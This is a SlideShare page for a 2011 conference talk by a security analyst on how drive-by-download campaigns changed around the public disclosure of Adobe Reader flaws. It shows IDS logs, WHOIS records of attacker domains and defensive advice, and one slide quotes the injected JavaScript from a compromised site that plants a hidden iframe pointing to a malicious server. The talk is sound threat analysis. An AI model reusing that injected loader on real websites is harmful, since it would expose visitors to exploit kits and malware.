SlideShare una empresa de Scribd logo

Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes

DefconRussia
DefconRussia

International Security Conference "ZeroNights 2011" - http://www.zeronights.org/

Tecnología
1 de 58
Descargar para leer sin conexión
Drive-By-Download Attack Evolution Before and After Vulnerability Disclosure Vladimir B. Kropotov TBINFORM (TNK-BP Group)
Drive-By-Download • Hackers distribute malware by "poisoning" legitimate websites • Hacker injects malicious iframes into HTML content • Vulnerabilities in Browsers, Acrobat, Java, Flash Player, etc, used You just want information by attacker about insurance, nothing more, but…
What does it look like? Host ready Malware Malware server controlled by attacker PC connected to the Internet Exploit OS, browser plugins, etc. INFO Exploit server controlled by attacker Known server with Intermediate server iframe controlled by attacker
How we find it? Date/Time 2011-08-05 10:44:53 YEKST Tag Name PDF_XFA_Script Observance Type Intrusion Detection Cleared Flag false Target IP Address 10.X.X.X Target Object Name 9090 Target Object Type Target Port Target Service unknown Source IP Address 10.X.X.Y SourcePort Name 2359 :compressed zlib :server total.logeater.org :URL //images/np/45eeb b038bd46a63e08665f308 1fb408/6cd14aca5927118 2c8a04159f9ad2804.pdf
DOES USER NEED IT?? How we find it? Date/Time 2011-08-05 10:44:53 Tag Name PDF_XFA_Script Target IP Address 10.X.X.X Target Object Name 9090 Target Object Type Target Port Source IP Address 10.X.X.Y SourcePort Name 2359 :compressed zlib :server total.logeater.org :URL //images/np/45eebb 038bd46a63e08665f3081 fb408/6cd14aca59271182 c8a04159f9ad2804.pdf
First indicators Date/Time 2011-07-26 11:24:37 Tag Name PDF_XFA_Script arg 3592ba48df0fae9e5f5c5b09535a 070d0b04020600510f0c56075c0 6040750 compressed zlib server mamjhvbw.dyndns.pro URL /ghqlv3ym/
First indicators Date/Time 2011-08-16 13:24:44 Tag Name ActiveX_Warning :clsid CAFEEFAC-DEC7-0000-0000- ABCDEFFEDCBA server skipetar.in URL /jb/pda.js Date/Time 2011-08-18 19:00:13 Tag Name ActiveX_Warning clsid CAFEEFAC-DEC7-0000-0000- ABCDEFFEDCBA server e1in.in URL /stat/574a353789f/pda.js
First indicators Date/Time 2011-08-09 10:17:14 Tag Name PDF_XFA_Script arg host=http://inaptly.in&b=486def4 compressed gzip server inaptly.in URL /jb/lastrger.php Date/Time 2011-08-14 14:06:28 Date/Time 2011-08-18 19:00:13 Tag Name PDF_XFA_Script Tag Name PDF_XFA_Script :arg host=http://oligist.in&b=486def4 arg host=http://e1in.in/stat&u=root :compressed gzip compressed zlib :server oligist.in server e1in.in URL /stat/574a353789f/lastrger.php :URL /jb/lastrger.php
First indicators Date/Time 2011-07-26 11:24:37 Date/Time 2011-08-09 10:17:14 Date/Time 2011-08-16 13:24:44 Tag Name PDF_XFA_Script Tag Name PDF_XFA_Script arg host=http://inaptly.in&b=486def4 Tag Name ActiveX_Warning compressed gzip :clsid CAFEEFAC-DEC7-0000-0000- arg 3592ba48df0fae9e5f5c5b09535a ABCDEFFEDCBA 070d0b04020600510f0c56075c0 server inaptly.in 6040750 compressed zlib server skipetar.in server mamjhvbw.dyndns.pro URL /jb/lastrger.php URL /jb/pda.js URL /ghqlv3ym/ Date/Time 2011-08-14 14:06:28 Date/Time 2011-08-18 19:00:13 Date/Time 2011-08-18 19:00:13 Tag Name PDF_XFA_Script Tag Name ActiveX_Warning Tag Name PDF_XFA_Script :arg host=http://oligist.in&b=486def4 arg host=http://e1in.in/stat&u=root clsid CAFEEFAC-DEC7-0000-0000- :compressed gzip compressed zlib ABCDEFFEDCBA :server oligist.in server e1in.in server e1in.in URL /stat/574a353789f/lastrger.php URL /stat/574a353789f/pda.js :URL /jb/lastrger.php
Example: o-strahovanie.ru
Example: o-strahovanie.ru
Example: o-strahovanie.ru SEP 02 / ============ bbb ============document.xmlSettings.if_ik=false;if(window.localS torage){ if(window.localStorage.if_ik){ if(parseInt(window.localStorage.if_ik)+2592000 < document.xmlSettings.time()) document.xmlSettings.if_ik=true; }else document.xmlSettings.if_ik=true;}else{// 4 osel if(document.xmlSettings.getCookie('if_ik')){ if(parseInt(document.xmlSettings.getCookie('if_ik'))+2592000 < document.xmlSettings.time()) document.xmlSettings.if_ik=true; }else document.xmlSettings.if_ik=true; }if(document.xmlSettings.if_ik){ if(window.localStorage)window.localStorage.if_ik=docu ment.xmlSettings.time(); else document.xmlSettings.setCookie('if_ik',document.xmlSettings.ti me(),{ expires:(document.xmlSettings.time() + 86400*365) }); Cookie: document.xmlSettings.iframe=document.createElement ('iframe'); if_ik1315314771 document.xmlSettings.iframe.style.cssText='height:1px; www.o-strahovanie.ru/ position:absolute;width:1px;border:none;left:- 5000px;'; 16004293056256333102392 document.body.appendChild(document.xmlSettings.ifra 93001403230174358* me); document.xmlSettings.iframe.src='htt'+'p://'+'disreg'+'a rding.i'+'n/xtqd2/08.p'+'hp';}
Example: o-strahovanie.ru / ============ bbb ============ else{// 4 osel if(document.xmlSettings.getCookie('if_ik')){ document.xmlSettings.iframe= document.createElement('iframe'); document.xmlSettings.iframe.style.cssText= 'height:1px;position:absolute;width:1px;border:none;left:-5000px;'; document.body.appendChild(document.xmlSettings.iframe); document.xmlSettings. iframe.src='htt'+'p://'+'disreg'+'arding.i'+'n/xtqd2/08.p'+'hp';} Cookie: if_ik1315314771 www.o-strahovanie.ru/ 1600429305625633310239293001403230174358*
Example: o-strahovanie.ru else{// 4 osel … document.body.appendChild(document.xmlSettings.iframe); document.xmlSettings.iframe.src= 'htt'+'p://'+'disreg'+'arding.i'+'n/xtqd2/08.p'+'hp';} iframe.src= 'http://disregarding.in/xtqd2/08.php'
Drive By Download o-strahovanie.ru Sep 02 NO Host ready Malware Malware server PC connected to the Internet Exploit NO OS, browser plugins, etc. INFO Exploit server Known server with Intermediate server iframe disregarding.in
Drive By Download o-strahovanie.ru Sep 12 Host ready Malware Malware server chamberwoman.in PC connected to janiculum.in the Internet Exploit OS, browser plugins, etc. INFO Exploit server chamberwoman.in janiculum.in Known server with Intermediate server iframe disregarding.in
Example: o-strahovanie.ru Domain Name:DISREGARDING.IN Created On:14-Jul-2011 11:09:59 UTC Registrant Name:Russell Rosario Registrant Street1:136 Oakdale Avenue City:Winter Haven Registrant Country:US Email:russellsrosario@teleworm.com Name Server:NS1.PRIDES.ME Name Server:NS2.PRIDES.ME Domain Name:JANICULUM.IN, CHAMBERWOMAN.IN Created On:12-Sep-2011 08:14 UTC Registrant Name:Russell Rosario
Example: o-strahovanie.ru Domain Name:DISREGARDING.IN Created On:14-Jul-2011 11:09:59 UTC Domain Name:JANICULUM.IN, CHAMBERWOMAN.IN Created On:12-Sep-2011 08:14 UTC Registrant Name:Russell Rosario No Payload, because No Payload Requests? Are they looking for customers?
Example: o-strahovanie.ru Domain ID:D5165642-AFIN Domain Name:DISREGARDING.IN Created On:14-Jul-2011 11:09:59 UTC Registrant Name: Russell Rosario Registrant Street1:136 Oakdale Avenue City:Winter Haven Registrant Country:US Email:russellsrosario@teleworm.com Name Server:NS1.PRIDES.ME Name Server:NS2.PRIDES.ME
Russell Rosario Domain Name:FILTRATED.IN filtrated.in Created On:14-Jul-2011 11:09:53 UTC Sponsoring Registrar:Directi Web Services Pvt. Ltd. (R118-AFIN) Created On:14-Jul-2011 11:09:56 UTC Registrant ID:TS_16731618 raptnesses.in Registrant Name:Russell Rosario Registrant Street1:136 Oakdale Avenue Created On:14-Jul-2011 11:09:56 UTC Registrant City:Winter Haven Registrant State/Province:Florida tansies.in Registrant Postal Code:33830 Registrant Country:US Created On:14-Jul-2011 11:10:03 UTC Registrant Phone:+1.8635571308 Email:russellsrosario@teleworm.com But Sally Doesn't Know…
Attack before public disclosure • Primary location for malicious sites: .IN • Physical servers location by IP-Address: Romania • Responsible person: Russell Rosario • Domains are new
Domain owner is the same Domain Name Created On Registrant Name irrefutably.in 15-Jul-2011 11:00:21 UTC Russell Rosario comprador.in 25-Jul-2011 05:59:54 UTC Russell Rosario hyalines.in 29-Jul-2011 09:39:33 UTC Russell Rosario suffrago.in 01-Aug-2011 05:35:12 UTC Russell Rosario ruritanian.in 01-Aug-2011 05:35:50 UTC Russell Rosario 20-Jul-2011 Acrobat Vulnerability vendor notified
Vulnerability reported to vendor VUPEN Security Research - Adobe Acrobat and Reader PCX Processing Heap Overflow Vulnerability VUPEN Security Research - Adobe Acrobat and Reader IFF Processing Heap Overflow Vulnerability VUPEN Security Research - Adobe Acrobat and Reader Picture Dimensions Heap Overflow Vulnerability VUPEN Security Research - Adobe Acrobat and Reader TIFF BitsPerSample Heap Overflow Vulnerability X. DISCLOSURE TIMELINE ----------------------------- 2011-07-20 - Vulnerability Discovered by VUPEN and shared with TPP customers 2011-09-14 - Public disclosure ZDI-11-310 : Adobe Reader Compound Glyph Index Sign Extension Remote Code Execution Vulnerability -- Disclosure Timeline: 2011-07-20 - Vulnerability reported to vendor 2011-10-26 - Coordinated public release of advisory ZDI-11-316 : Apple QuickTime H264 Matrix Conversion Remote Code Execution Vulnerability -- Disclosure Timeline: 2011-07-20 - Vulnerability reported to vendor 2011-10-27 - Coordinated public release of advisory
Harvetering machine started Domain Name Created On Registrant Name microdrili.in 05-Aug-2011 07:13:08 UTC Russell Rosario oligist.in 05-Aug-2011 07:13:12 UTC Russell Rosario provost.in 05-Aug-2011 07:13:18 UTC Russell Rosario vaginalitis.in 05-Aug-2011 07:13:25 UTC Russell Rosario kremlinology.in 05-Aug-2011 07:13:35 UTC Russell Rosario invariance.in 05-Aug-2011 07:13:41 UTC Russell Rosario alleghenian.in 05-Aug-2011 07:13:48 UTC Russell Rosario dandifies.in 05-Aug-2011 07:14:06 UTC Russell Rosario xenophoby.in 05-Aug-2011 07:14:09 UTC Russell Rosario alliaria.in 05-Aug-2011 07:14:15 UTC Russell Rosario skipetar.in 05-Aug-2011 07:14:21 UTC Russell Rosario inaptly.in 05-Aug-2011 07:15:05 UTC Russell Rosario allhallowtide.in 05-Aug-2011 07:15:20 UTC Russell Rosario
But may be someone knows? • Spamlists • AV Vendors • Safebrowsing • Securityfocus
Spamlists, Aug 19
AV Vendors, Aug 18
Safebrowsing Aug 20
Securityfocus Sep 07 Sent: Wednesday, September 07, 2011 11:31 PM Subject: There is a strange get request header in all web pages of my site? I'm worry about Trojan attack! Today I found that Kasper Anti Virus has blocked my site and says to the clients that this site is affected by a Trojan. I traced my site with Fiddler debugging tool and I found that every time I send a request to the site a GET request handler is established to the following URL: "http://carlos.c0m.li/iframe.php?id=v4pfa2 4nw91yhoszkdmoh413ywv6cp7"
PDF vulnerabilities public disclosure Sep 14. What to expect?
PDF vulnerabilities public disclosure Sep 14. What to expect? NO GOOD NEWS, JUST EPIC FAIL for site administrators
No good news. Hundreds of domains were registered ITALIA-NEW.IN KLERK-EVEN.RU BANER-KLERK.RU KLERK-EVENTS.RU BANK-KLERK.RU KLERK-LAW.RU BANNER-KLERK.RU KLERK-NEW.RU BLOGS-KLERK.RU KLERK-NEWS.RU BUH-KLERK.RU KLERK-REKLAMA.RU DAILY-KP.RU KLERK-RU.RU FORUM-KLERK.RU KLERK-WORK.RU I-OBOZREVATEL.RU KLERK2.RU INTERFAX-REGION.RU OBOZREVATEL-RU.RU JOB-KLERK.RU OBOZREVATELRU.RU KLERK-BANK.RU WIKI-KLERK.RU KLERK-BANKIR.RU PRESS-RZD.RU KLERK-BIZ.RU RZD-RZD.RU KLERK-BOSS.RU IPGEOBASE.IN KLERK-BUH.RU ***
“New generation” Host ready Malware Malware server controlled by attacker PC connected to Exploit the Internet OS, browser plugins, etc. INFO Exploit server controlled by attacker Intermediate server controlled by attacker Known server with Other known server iframe NOT controlled by attacker
Attack after public disclosure • Primary location for malicious sites: .IN, .RU, .CX.CC, .BIZ, .INFO,… • Physical servers location by IP-Address: International • Domains registered to different spurious persons • Domain lifetime ~ time to Blacklists appearance • Attack refers to malicious server for a short period of time, and to well known one almost all day long (Blacklist evasion technique) • If you don't know exact malware URL, site redirects to well known server • Different types of payload used: password stealers, win lockers, and even “normal” (or another ZD) files installed
Known sites examples: RZD.RU Russian rail roads
Known sites examples: RZD.RU
Known sites examples: RZD.RU Russian rail roads
Known sites examples: RZD.RU
Known sites examples: KP.RU (Komsomolskaya Pravda, newspaper)
Known sites examples: KP.RU
Other examples: EG.RU (newspaper, 263 685 visits per day)
Other examples: svpressa.ru (newspaper 276 720 visits per day)
Malware examples: Banks targeted attack
Malware examples: Banks targeted attack
Another news, another phone… • Legal • Faked
Malware examples: Banks targeted attack
Malware examples
Malware examples
Script examples
Sample analysis (Virus Total)
Sample analysis (Virus Total)
Sample analysis (Virus Total)
Sample analysis (Virus Total)
Sample analysis (Virus Total)
Sample analysis (Virus Total)
What can we do? • Patch endpoint • Tighten the Internet filtering (default deny if possible) • No Internet surfing with admin rights • See what’s happening (continuous monitoring) • Check if you’re well (regular technical audits) • Educate people
Credits • Sergey V. Soldatov, TBINFORM (TNK-BP Group) • Konstantin Y. Kadushkin, TBINFORM (TNK-BP Group) • Wayne Huang, ARMORIZE
THE END Vladimir B. Kropotov Information security analyst TBINFORM (TNK-BP Group) vbkropotov@tnk-bp.com kropotov@ieee.org

Recomendados

Php version 5
Php version 5Php version 5
Php version 5Manuel Rodriguez
 
PHP & Performance
PHP & PerformancePHP & Performance
PHP & Performance毅 吕
 
How we use and deploy Varnish at Opera
How we use and deploy Varnish at OperaHow we use and deploy Varnish at Opera
How we use and deploy Varnish at OperaCosimo Streppone
 
extending-php
extending-phpextending-php
extending-phptutorialsruby
 
php & performance
php & performance php & performance
php & performancesimon8410
 
Reverse proxies & Inconsistency
Reverse proxies & InconsistencyReverse proxies & Inconsistency
Reverse proxies & InconsistencyGreenD0g
 
Hyperledger composer
Hyperledger composerHyperledger composer
Hyperledger composerwonyong hwang
 
Does your configuration code smell?
Does your configuration code smell?Does your configuration code smell?
Does your configuration code smell?Tushar Sharma
 

Recomendados

Php version 5
Php version 5Php version 5
Php version 5Manuel Rodriguez
 
PHP & Performance
PHP & PerformancePHP & Performance
PHP & Performance毅 吕
 
How we use and deploy Varnish at Opera
How we use and deploy Varnish at OperaHow we use and deploy Varnish at Opera
How we use and deploy Varnish at OperaCosimo Streppone
 
extending-php
extending-phpextending-php
extending-phptutorialsruby
 
php & performance
php & performance php & performance
php & performancesimon8410
 
Reverse proxies & Inconsistency
Reverse proxies & InconsistencyReverse proxies & Inconsistency
Reverse proxies & InconsistencyGreenD0g
 
Hyperledger composer
Hyperledger composerHyperledger composer
Hyperledger composerwonyong hwang
 
Does your configuration code smell?
Does your configuration code smell?Does your configuration code smell?
Does your configuration code smell?Tushar Sharma
 
Hadoop Admin role & Hive Data Warehouse support
Hadoop Admin role & Hive Data Warehouse supportHadoop Admin role & Hive Data Warehouse support
Hadoop Admin role & Hive Data Warehouse supportmdcdwh
 
Weird proxies/2 and a bit of magic
Weird proxies/2 and a bit of magic Weird proxies/2 and a bit of magic
Weird proxies/2 and a bit of magic GreenD0g
 
Speed up web APIs with Expressive and Swoole (PHP Day 2018)
Speed up web APIs with Expressive and Swoole (PHP Day 2018) Speed up web APIs with Expressive and Swoole (PHP Day 2018)
Speed up web APIs with Expressive and Swoole (PHP Day 2018) Zend by Rogue Wave Software
 
ApacheConNA 2015: What's new in Apache httpd 2.4
ApacheConNA 2015: What's new in Apache httpd 2.4ApacheConNA 2015: What's new in Apache httpd 2.4
ApacheConNA 2015: What's new in Apache httpd 2.4Jim Jagielski
 
The worst Ruby codes I’ve seen in my life - RubyKaigi 2015
The worst Ruby codes I’ve seen in my life - RubyKaigi 2015The worst Ruby codes I’ve seen in my life - RubyKaigi 2015
The worst Ruby codes I’ve seen in my life - RubyKaigi 2015Fernando Hamasaki de Amorim
 
Site Performance - From Pinto to Ferrari
Site Performance - From Pinto to FerrariSite Performance - From Pinto to Ferrari
Site Performance - From Pinto to FerrariJoseph Scott
 
Puppet at Opera Sofware - PuppetCamp Oslo 2013
Puppet at Opera Sofware - PuppetCamp Oslo 2013Puppet at Opera Sofware - PuppetCamp Oslo 2013
Puppet at Opera Sofware - PuppetCamp Oslo 2013Cosimo Streppone
 
Submit PHP: Standards in PHP world. Михайло Морозов
Submit PHP: Standards in PHP world. Михайло МорозовSubmit PHP: Standards in PHP world. Михайло Морозов
Submit PHP: Standards in PHP world. Михайло МорозовBinary Studio
 
httpd — Apache Web Server
httpd — Apache Web Serverhttpd — Apache Web Server
httpd — Apache Web Serverwebhostingguy
 
PECL Picks - Extensions to make your life better
PECL Picks - Extensions to make your life betterPECL Picks - Extensions to make your life better
PECL Picks - Extensions to make your life betterZendCon
 
On UnQLite
On UnQLiteOn UnQLite
On UnQLitecharsbar
 
kubernetes practice
kubernetes practicekubernetes practice
kubernetes practicewonyong hwang
 
Docker practice
Docker practiceDocker practice
Docker practicewonyong hwang
 
Using and scaling Rack and Rack-based middleware
Using and scaling Rack and Rack-based middlewareUsing and scaling Rack and Rack-based middleware
Using and scaling Rack and Rack-based middlewareAlona Mekhovova
 
Datagrids with Symfony 2, Backbone and Backgrid
Datagrids with Symfony 2, Backbone and BackgridDatagrids with Symfony 2, Backbone and Backgrid
Datagrids with Symfony 2, Backbone and Backgrideugenio pombi
 
WordPress Home Server with Raspberry Pi
WordPress Home Server with Raspberry PiWordPress Home Server with Raspberry Pi
WordPress Home Server with Raspberry PiYuriko IKEDA
 
Security Configuration Management for Dummies
Security Configuration Management for DummiesSecurity Configuration Management for Dummies
Security Configuration Management for DummiesTripwire
 
Information Secuirty Vulnerability Management
Information Secuirty Vulnerability ManagementInformation Secuirty Vulnerability Management
Information Secuirty Vulnerability Managementtschraider
 
The information security audit
The information security auditThe information security audit
The information security auditDhani Ahmad
 
Lect 3
Lect 3Lect 3
Lect 3Muhammad Qadeer
 
5.4 it security audit (mauritius)
5.4 it security audit (mauritius)5.4 it security audit (mauritius)
5.4 it security audit (mauritius)Corporate Registers Forum
 
The Security Vulnerability Assessment Process & Best Practices
The Security Vulnerability Assessment Process & Best PracticesThe Security Vulnerability Assessment Process & Best Practices
The Security Vulnerability Assessment Process & Best PracticesKellep Charles
 

Más contenido relacionado

La actualidad más candente

Hadoop Admin role & Hive Data Warehouse support
Hadoop Admin role & Hive Data Warehouse supportHadoop Admin role & Hive Data Warehouse support
Hadoop Admin role & Hive Data Warehouse supportmdcdwh
 
Weird proxies/2 and a bit of magic
Weird proxies/2 and a bit of magic Weird proxies/2 and a bit of magic
Weird proxies/2 and a bit of magic GreenD0g
 
Speed up web APIs with Expressive and Swoole (PHP Day 2018)
Speed up web APIs with Expressive and Swoole (PHP Day 2018) Speed up web APIs with Expressive and Swoole (PHP Day 2018)
Speed up web APIs with Expressive and Swoole (PHP Day 2018) Zend by Rogue Wave Software
 
ApacheConNA 2015: What's new in Apache httpd 2.4
ApacheConNA 2015: What's new in Apache httpd 2.4ApacheConNA 2015: What's new in Apache httpd 2.4
ApacheConNA 2015: What's new in Apache httpd 2.4Jim Jagielski
 
The worst Ruby codes I’ve seen in my life - RubyKaigi 2015
The worst Ruby codes I’ve seen in my life - RubyKaigi 2015The worst Ruby codes I’ve seen in my life - RubyKaigi 2015
The worst Ruby codes I’ve seen in my life - RubyKaigi 2015Fernando Hamasaki de Amorim
 
Site Performance - From Pinto to Ferrari
Site Performance - From Pinto to FerrariSite Performance - From Pinto to Ferrari
Site Performance - From Pinto to FerrariJoseph Scott
 
Puppet at Opera Sofware - PuppetCamp Oslo 2013
Puppet at Opera Sofware - PuppetCamp Oslo 2013Puppet at Opera Sofware - PuppetCamp Oslo 2013
Puppet at Opera Sofware - PuppetCamp Oslo 2013Cosimo Streppone
 
Submit PHP: Standards in PHP world. Михайло Морозов
Submit PHP: Standards in PHP world. Михайло МорозовSubmit PHP: Standards in PHP world. Михайло Морозов
Submit PHP: Standards in PHP world. Михайло МорозовBinary Studio
 
httpd — Apache Web Server
httpd — Apache Web Serverhttpd — Apache Web Server
httpd — Apache Web Serverwebhostingguy
 
PECL Picks - Extensions to make your life better
PECL Picks - Extensions to make your life betterPECL Picks - Extensions to make your life better
PECL Picks - Extensions to make your life betterZendCon
 
On UnQLite
On UnQLiteOn UnQLite
On UnQLitecharsbar
 
Using and scaling Rack and Rack-based middleware
Using and scaling Rack and Rack-based middlewareUsing and scaling Rack and Rack-based middleware
Using and scaling Rack and Rack-based middlewareAlona Mekhovova
 
Datagrids with Symfony 2, Backbone and Backgrid
Datagrids with Symfony 2, Backbone and BackgridDatagrids with Symfony 2, Backbone and Backgrid
Datagrids with Symfony 2, Backbone and Backgrideugenio pombi
 
WordPress Home Server with Raspberry Pi
WordPress Home Server with Raspberry PiWordPress Home Server with Raspberry Pi
WordPress Home Server with Raspberry PiYuriko IKEDA
 

La actualidad más candente (16)

Hadoop Admin role & Hive Data Warehouse support
Hadoop Admin role & Hive Data Warehouse supportHadoop Admin role & Hive Data Warehouse support
Hadoop Admin role & Hive Data Warehouse support
 
Weird proxies/2 and a bit of magic
Weird proxies/2 and a bit of magic Weird proxies/2 and a bit of magic
Weird proxies/2 and a bit of magic
 
Speed up web APIs with Expressive and Swoole (PHP Day 2018)
Speed up web APIs with Expressive and Swoole (PHP Day 2018) Speed up web APIs with Expressive and Swoole (PHP Day 2018)
Speed up web APIs with Expressive and Swoole (PHP Day 2018)
 
ApacheConNA 2015: What's new in Apache httpd 2.4
ApacheConNA 2015: What's new in Apache httpd 2.4ApacheConNA 2015: What's new in Apache httpd 2.4
ApacheConNA 2015: What's new in Apache httpd 2.4
 
The worst Ruby codes I’ve seen in my life - RubyKaigi 2015
The worst Ruby codes I’ve seen in my life - RubyKaigi 2015The worst Ruby codes I’ve seen in my life - RubyKaigi 2015
The worst Ruby codes I’ve seen in my life - RubyKaigi 2015
 
Site Performance - From Pinto to Ferrari
Site Performance - From Pinto to FerrariSite Performance - From Pinto to Ferrari
Site Performance - From Pinto to Ferrari
 
Puppet at Opera Sofware - PuppetCamp Oslo 2013
Puppet at Opera Sofware - PuppetCamp Oslo 2013Puppet at Opera Sofware - PuppetCamp Oslo 2013
Puppet at Opera Sofware - PuppetCamp Oslo 2013
 
Submit PHP: Standards in PHP world. Михайло Морозов
Submit PHP: Standards in PHP world. Михайло МорозовSubmit PHP: Standards in PHP world. Михайло Морозов
Submit PHP: Standards in PHP world. Михайло Морозов
 
httpd — Apache Web Server
httpd — Apache Web Serverhttpd — Apache Web Server
httpd — Apache Web Server
 
PECL Picks - Extensions to make your life better
PECL Picks - Extensions to make your life betterPECL Picks - Extensions to make your life better
PECL Picks - Extensions to make your life better
 
On UnQLite
On UnQLiteOn UnQLite
On UnQLite
 
kubernetes practice
kubernetes practicekubernetes practice
kubernetes practice
 
Docker practice
Docker practiceDocker practice
Docker practice
 
Using and scaling Rack and Rack-based middleware
Using and scaling Rack and Rack-based middlewareUsing and scaling Rack and Rack-based middleware
Using and scaling Rack and Rack-based middleware
 
Datagrids with Symfony 2, Backbone and Backgrid
Datagrids with Symfony 2, Backbone and BackgridDatagrids with Symfony 2, Backbone and Backgrid
Datagrids with Symfony 2, Backbone and Backgrid
 
WordPress Home Server with Raspberry Pi
WordPress Home Server with Raspberry PiWordPress Home Server with Raspberry Pi
WordPress Home Server with Raspberry Pi
 

Destacado

Security Configuration Management for Dummies
Security Configuration Management for DummiesSecurity Configuration Management for Dummies
Security Configuration Management for DummiesTripwire
 
Information Secuirty Vulnerability Management
Information Secuirty Vulnerability ManagementInformation Secuirty Vulnerability Management
Information Secuirty Vulnerability Managementtschraider
 
The information security audit
The information security auditThe information security audit
The information security auditDhani Ahmad
 
The Security Vulnerability Assessment Process & Best Practices
The Security Vulnerability Assessment Process & Best PracticesThe Security Vulnerability Assessment Process & Best Practices
The Security Vulnerability Assessment Process & Best PracticesKellep Charles
 
Eight Steps to an Effective Vulnerability Assessment
Eight Steps to an Effective Vulnerability AssessmentEight Steps to an Effective Vulnerability Assessment
Eight Steps to an Effective Vulnerability AssessmentSirius
 

Destacado (7)

Security Configuration Management for Dummies
Security Configuration Management for DummiesSecurity Configuration Management for Dummies
Security Configuration Management for Dummies
 
Information Secuirty Vulnerability Management
Information Secuirty Vulnerability ManagementInformation Secuirty Vulnerability Management
Information Secuirty Vulnerability Management
 
The information security audit
The information security auditThe information security audit
The information security audit
 
Lect 3
Lect 3Lect 3
Lect 3
 
5.4 it security audit (mauritius)
5.4 it security audit (mauritius)5.4 it security audit (mauritius)
5.4 it security audit (mauritius)
 
The Security Vulnerability Assessment Process & Best Practices
The Security Vulnerability Assessment Process & Best PracticesThe Security Vulnerability Assessment Process & Best Practices
The Security Vulnerability Assessment Process & Best Practices
 
Eight Steps to an Effective Vulnerability Assessment
Eight Steps to an Effective Vulnerability AssessmentEight Steps to an Effective Vulnerability Assessment
Eight Steps to an Effective Vulnerability Assessment
 

Similar a Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes

Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry PiGrâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry PiJérémy Derussé
 
Rapid java backend and api development for mobile devices
Rapid java backend and api development for mobile devicesRapid java backend and api development for mobile devices
Rapid java backend and api development for mobile devicesciklum_ods
 
Год в Github bugbounty, опыт участия
Год в Github bugbounty, опыт участияГод в Github bugbounty, опыт участия
Год в Github bugbounty, опыт участияdefcon_kz
 
Bootstrapping multidc observability stack
Bootstrapping multidc observability stackBootstrapping multidc observability stack
Bootstrapping multidc observability stackBram Vogelaar
 
How to Design a Great API (using flask) [ploneconf2017]
How to Design a Great API (using flask) [ploneconf2017]How to Design a Great API (using flask) [ploneconf2017]
How to Design a Great API (using flask) [ploneconf2017]Devon Bernard
 
HTTP Caching and PHP
HTTP Caching and PHPHTTP Caching and PHP
HTTP Caching and PHPDavid de Boer
 
Swift profiling middleware and tools
Swift profiling middleware and toolsSwift profiling middleware and tools
Swift profiling middleware and toolszhang hua
 
Building Scalable Websites with Perl
Building Scalable Websites with PerlBuilding Scalable Websites with Perl
Building Scalable Websites with PerlPerrin Harkins
 
Heavy Web Optimization: Backend
Heavy Web Optimization: BackendHeavy Web Optimization: Backend
Heavy Web Optimization: BackendVõ Duy Tuấn
 
Apache and PHP: Why httpd.conf is your new BFF!
Apache and PHP: Why httpd.conf is your new BFF!Apache and PHP: Why httpd.conf is your new BFF!
Apache and PHP: Why httpd.conf is your new BFF!Jeff Jones
 
Profiling PHP with Xdebug / Webgrind
Profiling PHP with Xdebug / WebgrindProfiling PHP with Xdebug / Webgrind
Profiling PHP with Xdebug / WebgrindSam Keen
 
UEMB200: Next Generation of Endpoint Management Architecture and Discovery Se...
UEMB200: Next Generation of Endpoint Management Architecture and Discovery Se...UEMB200: Next Generation of Endpoint Management Architecture and Discovery Se...
UEMB200: Next Generation of Endpoint Management Architecture and Discovery Se...Ivanti
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecuritiesamiable_indian
 
Debugging: Rules & Tools
Debugging: Rules & ToolsDebugging: Rules & Tools
Debugging: Rules & ToolsIan Barber
 
NLIT 2011: Chef & Capistrano
NLIT 2011: Chef & CapistranoNLIT 2011: Chef & Capistrano
NLIT 2011: Chef & Capistranonickblah
 
Lean Php Presentation
Lean Php PresentationLean Php Presentation
Lean Php PresentationAlan Pinstein
 

Similar a Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes (20)

Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry PiGrâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
Grâce aux tags Varnish, j'ai switché ma prod sur Raspberry Pi
 
Rapid java backend and api development for mobile devices
Rapid java backend and api development for mobile devicesRapid java backend and api development for mobile devices
Rapid java backend and api development for mobile devices
 
Год в Github bugbounty, опыт участия
Год в Github bugbounty, опыт участияГод в Github bugbounty, опыт участия
Год в Github bugbounty, опыт участия
 
Bootstrapping multidc observability stack
Bootstrapping multidc observability stackBootstrapping multidc observability stack
Bootstrapping multidc observability stack
 
How to Design a Great API (using flask) [ploneconf2017]
How to Design a Great API (using flask) [ploneconf2017]How to Design a Great API (using flask) [ploneconf2017]
How to Design a Great API (using flask) [ploneconf2017]
 
HTTP Caching and PHP
HTTP Caching and PHPHTTP Caching and PHP
HTTP Caching and PHP
 
Swift profiling middleware and tools
Swift profiling middleware and toolsSwift profiling middleware and tools
Swift profiling middleware and tools
 
Building Scalable Websites with Perl
Building Scalable Websites with PerlBuilding Scalable Websites with Perl
Building Scalable Websites with Perl
 
Heavy Web Optimization: Backend
Heavy Web Optimization: BackendHeavy Web Optimization: Backend
Heavy Web Optimization: Backend
 
Apache and PHP: Why httpd.conf is your new BFF!
Apache and PHP: Why httpd.conf is your new BFF!Apache and PHP: Why httpd.conf is your new BFF!
Apache and PHP: Why httpd.conf is your new BFF!
 
Oracle API Gateway Installation
Oracle API Gateway InstallationOracle API Gateway Installation
Oracle API Gateway Installation
 
Profiling PHP with Xdebug / Webgrind
Profiling PHP with Xdebug / WebgrindProfiling PHP with Xdebug / Webgrind
Profiling PHP with Xdebug / Webgrind
 
Nginx pres
Nginx presNginx pres
Nginx pres
 
Bpstudy20101221
Bpstudy20101221Bpstudy20101221
Bpstudy20101221
 
Python at Facebook
Python at FacebookPython at Facebook
Python at Facebook
 
UEMB200: Next Generation of Endpoint Management Architecture and Discovery Se...
UEMB200: Next Generation of Endpoint Management Architecture and Discovery Se...UEMB200: Next Generation of Endpoint Management Architecture and Discovery Se...
UEMB200: Next Generation of Endpoint Management Architecture and Discovery Se...
 
Hacking Client Side Insecurities
